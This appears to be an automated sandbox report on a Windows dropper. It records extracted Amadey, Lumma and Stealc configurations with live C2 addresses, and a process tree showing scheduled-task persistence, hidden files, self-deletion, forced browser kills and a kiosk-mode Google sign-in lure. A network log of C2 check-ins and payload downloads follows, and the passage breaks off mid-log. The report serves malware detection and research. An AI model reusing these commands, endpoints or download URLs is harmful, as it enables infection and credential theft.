Analysis

  • max time kernel
    141s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    13-12-2024 00:06

General

  • Target

    9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe

  • Size

    3.1MB

  • MD5

    ca0f8493d787c9f2d97d00c245143f41

  • SHA1

    6ebb479b6c871e48ab97d2784b9e61fd2da1b55b

  • SHA256

    9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229

  • SHA512

    74999928fc8a11b4963180e2647d93dad68d5f25388a1dde4e9aed94bf3e3cbca9710275ebfc0c468c9071c0f4f0302f73bfcf5c65d1b1334520ac68fed21fc3

  • SSDEEP

    98304:XRN/TBqe65AG4sj49ezlNOYO+sR93Q1u7kW:X3B0oz+sRRQ1D

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://drive-connect.cyou/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://drive-connect.cyou/api

https://covery-mover.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • XMRig Miner payload 10 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 22 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 43 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of SendNotifyMessage 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe
    "C:\Users\Admin\AppData\Local\Temp\9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2212
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2872
      • C:\Users\Admin\AppData\Local\Temp\1014564001\9JTVo50.exe
        "C:\Users\Admin\AppData\Local\Temp\1014564001\9JTVo50.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2060
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 44
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:2796
      • C:\Users\Admin\AppData\Local\Temp\1014569001\ccb835542e.exe
        "C:\Users\Admin\AppData\Local\Temp\1014569001\ccb835542e.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1484
        • C:\Windows\system32\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1936
          • C:\Windows\system32\mode.com
            mode 65,10
            5⤵
              PID:3064
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e file.zip -p24291711423417250691697322505 -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:2188
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e extracted/file_7.zip -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:2068
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e extracted/file_6.zip -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:1984
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e extracted/file_5.zip -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:1920
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e extracted/file_4.zip -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:840
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e extracted/file_3.zip -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:2528
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e extracted/file_2.zip -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:1804
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e extracted/file_1.zip -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:3068
            • C:\Windows\system32\attrib.exe
              attrib +H "in.exe"
              5⤵
              • Views/modifies file attributes
              PID:1796
            • C:\Users\Admin\AppData\Local\Temp\main\in.exe
              "in.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1656
              • C:\Windows\system32\attrib.exe
                attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                6⤵
                • Views/modifies file attributes
                PID:2960
              • C:\Windows\system32\attrib.exe
                attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                6⤵
                • Views/modifies file attributes
                PID:2264
              • C:\Windows\system32\schtasks.exe
                schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                6⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1784
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell ping 127.0.0.1; del in.exe
                6⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1816
                • C:\Windows\system32\PING.EXE
                  "C:\Windows\system32\PING.EXE" 127.0.0.1
                  7⤵
                  • System Network Configuration Discovery: Internet Connection Discovery
                  • Runs ping.exe
                  PID:2384
        • C:\Users\Admin\AppData\Local\Temp\1014570001\45c3c2bb5b.exe
          "C:\Users\Admin\AppData\Local\Temp\1014570001\45c3c2bb5b.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:1868
          • C:\Users\Admin\AppData\Local\Temp\1014570001\45c3c2bb5b.exe
            "C:\Users\Admin\AppData\Local\Temp\1014570001\45c3c2bb5b.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Modifies system certificate store
            PID:688
        • C:\Users\Admin\AppData\Local\Temp\1014571001\4b025ca5ea.exe
          "C:\Users\Admin\AppData\Local\Temp\1014571001\4b025ca5ea.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          PID:2792
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1014571001\4b025ca5ea.exe" & rd /s /q "C:\ProgramData\BIMO8YMO89RQ" & exit
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2252
            • C:\Windows\SysWOW64\timeout.exe
              timeout /t 10
              5⤵
              • System Location Discovery: System Language Discovery
              • Delays execution with timeout.exe
              PID:2820
        • C:\Users\Admin\AppData\Local\Temp\1014572001\2ccaab4f2b.exe
          "C:\Users\Admin\AppData\Local\Temp\1014572001\2ccaab4f2b.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1380
        • C:\Users\Admin\AppData\Local\Temp\1014573001\fb7039a8b8.exe
          "C:\Users\Admin\AppData\Local\Temp\1014573001\fb7039a8b8.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:2348
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM firefox.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2644
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM chrome.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1680
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM msedge.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2776
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM opera.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2980
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM brave.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1264
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
            4⤵
              PID:1368
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                5⤵
                • Checks processor information in registry
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:1860
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.0.1983739428\1088985320" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1092 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d832464-d7db-432a-8f81-ac16bfbda947} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 1316 106d3458 gpu
                  6⤵
                    PID:2952
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.1.1829025502\1735701162" -parentBuildID 20221007134813 -prefsHandle 1536 -prefMapHandle 1532 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ade151c6-d829-4e47-b4d9-ecd242ea824a} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 1548 f3ec158 socket
                    6⤵
                      PID:664
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.2.557416954\589131999" -childID 1 -isForBrowser -prefsHandle 2040 -prefMapHandle 2036 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee70d7e9-dbd6-4efe-aea6-00acd2a11cda} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 2056 1065e758 tab
                      6⤵
                        PID:1524
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.3.1135025671\1179398381" -childID 2 -isForBrowser -prefsHandle 2768 -prefMapHandle 2764 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {53ece92e-d407-4e28-9f15-f56a60771bf2} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 2780 e64258 tab
                        6⤵
                          PID:2644
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.4.1840816558\1387757752" -childID 3 -isForBrowser -prefsHandle 3768 -prefMapHandle 3764 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {66428f64-dd1a-4c27-b89a-21932258a8d0} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 3780 174acd58 tab
                          6⤵
                            PID:1784
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.5.1481086733\2094245306" -childID 4 -isForBrowser -prefsHandle 3892 -prefMapHandle 3896 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {077571cb-4d47-4627-a064-9bb94643dfd3} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 3880 1f50aa58 tab
                            6⤵
                              PID:1376
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1860.6.1072565005\38282309" -childID 5 -isForBrowser -prefsHandle 4048 -prefMapHandle 4052 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f5756a53-30c8-4c61-8575-5813d1314b06} 1860 "\\.\pipe\gecko-crash-server-pipe.1860" 4036 1f509858 tab
                              6⤵
                                PID:2896
                        • C:\Users\Admin\AppData\Local\Temp\1014574001\1206054524.exe
                          "C:\Users\Admin\AppData\Local\Temp\1014574001\1206054524.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2440
                        • C:\Users\Admin\AppData\Local\Temp\1014575001\7b581c1e44.exe
                          "C:\Users\Admin\AppData\Local\Temp\1014575001\7b581c1e44.exe"
                          3⤵
                          • Modifies Windows Defender Real-time Protection settings
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Windows security modification
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2888
                        • C:\Users\Admin\AppData\Local\Temp\1014576001\777b33ea97.exe
                          "C:\Users\Admin\AppData\Local\Temp\1014576001\777b33ea97.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Loads dropped DLL
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3372
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {36DD6E4C-3FE4-4BF8-9B1A-EB67400EE262} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]
                      1⤵
                      • Loads dropped DLL
                      PID:3248
                      • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                        C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1584
                        • C:\Windows\explorer.exe
                          explorer.exe
                          3⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3284
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                          3⤵
                          • Drops file in System32 directory
                          • System Network Configuration Discovery: Internet Connection Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3320
                          • C:\Windows\system32\PING.EXE
                            "C:\Windows\system32\PING.EXE" 127.1.10.1
                            4⤵
                            • System Network Configuration Discovery: Internet Connection Discovery
                            • Runs ping.exe
                            PID:3048
                      • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                        C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3972
                        • C:\Windows\explorer.exe
                          explorer.exe
                          3⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3996
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                          3⤵
                          • Drops file in System32 directory
                          • System Network Configuration Discovery: Internet Connection Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4056
                          • C:\Windows\system32\PING.EXE
                            "C:\Windows\system32\PING.EXE" 127.1.10.1
                            4⤵
                            • System Network Configuration Discovery: Internet Connection Discovery
                            • Runs ping.exe
                            PID:3764

                    Network

                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 4
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:02 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 156
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:07 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:24 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:27 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:31 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      POST
                      http://185.215.113.43/Zu7JuNko/index.php
                      skotes.exe
                      Remote address:
                      185.215.113.43:80
                      Request
                      POST /Zu7JuNko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.43
                      Content-Length: 31
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:42 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      GET
                      http://31.41.244.11/files/6904700471/9JTVo50.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/6904700471/9JTVo50.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:03 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 2660864
                      Last-Modified: Thu, 12 Dec 2024 23:33:41 GMT
                      Connection: keep-alive
                      ETag: "675b72d5-289a00"
                      Accept-Ranges: bytes
                    • flag-ru
                      GET
                      http://31.41.244.11/files/burpin1/random.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/burpin1/random.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:07 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 4438776
                      Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT
                      Connection: keep-alive
                      ETag: "675784f0-43baf8"
                      Accept-Ranges: bytes
                    • flag-ru
                      GET
                      http://31.41.244.11/files/fate/random.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/fate/random.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:13 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 727552
                      Last-Modified: Wed, 11 Dec 2024 08:22:24 GMT
                      Connection: keep-alive
                      ETag: "67594bc0-b1a00"
                      Accept-Ranges: bytes
                    • flag-ru
                      GET
                      http://31.41.244.11/files/encoxx/random.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/encoxx/random.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
